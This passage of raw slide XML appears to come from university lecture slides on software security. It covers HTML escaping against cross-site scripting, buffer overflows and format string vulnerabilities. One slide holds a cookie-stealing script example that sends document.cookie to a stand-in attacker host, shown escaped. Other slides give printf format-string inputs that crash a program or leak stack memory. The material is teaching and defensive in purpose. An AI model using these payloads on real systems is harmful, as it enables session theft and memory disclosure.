                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Escape input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt;document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot;http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://server.attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRP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29</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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4" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14375" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Typical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>problem of input processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>Examples shown at last lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>One more example of buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>overflow:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="361950" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="361950" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Morris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="28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a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>HTML escaping</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300"/>
              <a:t>You must escape characters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>&amp; becomes &amp;amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>&lt; becomes &amp;lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>&gt; becomes &amp;gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300"/>
              <a:t>In attribute values you must also escape the quote characters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>" becomes &amp;quot;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>' becomes &amp;#39;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300"/>
              <a:t>If your document is ASCII and or another non-Unicode encoding and you're using characters that aren't supported, you'll need to escape them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="230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30</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Format string vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Wide class of functions accepting format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>printf(“%s”, X);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>resulting string is returned to user (= attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>formatting string can be under attackers control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>variables formatted into string can be controlled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Resulting vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>memory content from stack is formatted into string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>possibly any memory if attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" smtClean="0"/>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="cs-CZ" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="cs-CZ" sz="1800">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.team-teso.net/articles/formatstring/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="cs-CZ" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="cs-CZ" sz="1800">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.eeye.com/eEyeDigitalSecurity/media/ResearchPapers/eeyeMRV-Oct2006.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="cs-CZ" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="6573838"/>
            <a:ext cx="396875" cy="284162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="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sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61445" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="6572250"/>
            <a:ext cx="5111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sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Zástupný symbol pro číslo snímku 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{458089DF-935D-4C65-A693-E2F32DF777D9}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Format string vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>printf ( user input );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>A format specification, which consists of optional and required fields, has the following form:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>precision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>] [{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>I32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1"/>
              <a:t>I64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>}]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Variable number of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Taken from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98309" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="5608638"/>
            <a:ext cx="87757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a:t>Source and links:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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725" y="692150"/>
            <a:ext cx="8466138" cy="5619750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99334" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7596188" y="6308725"/>
            <a:ext cx="11985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a:t>Source: MSDN</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="120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33</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Crashing the program</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>printf ("%s%s%s%s%s%s%s%s%s%s%s%s");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>%s will print the string at the pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>High chance that pointers will be invalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Invalid access to memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Program crashes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" alt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34</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>View the stack</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101379" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>printf ("%08x %08x %08x %08x %08x\n");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Hexadecimal values (8-digit padded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Example output </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>e32a6ea8 e32a6eb8 00000000 56da6300 56db99e0</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Read from memory</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Prints string at a pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Reads memory at that address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Address is taken from the parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>i.e. taken from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>If format string is also on the stack (e.g. a local variable) you can specify where to read. </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" alt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36</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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a:xfrm>
            <a:off x="503238" y="692150"/>
            <a:ext cx="8229600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Read from memory</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="1628775"/>
            <a:ext cx="8229600" cy="4392613"/>
          </a:xfrm>
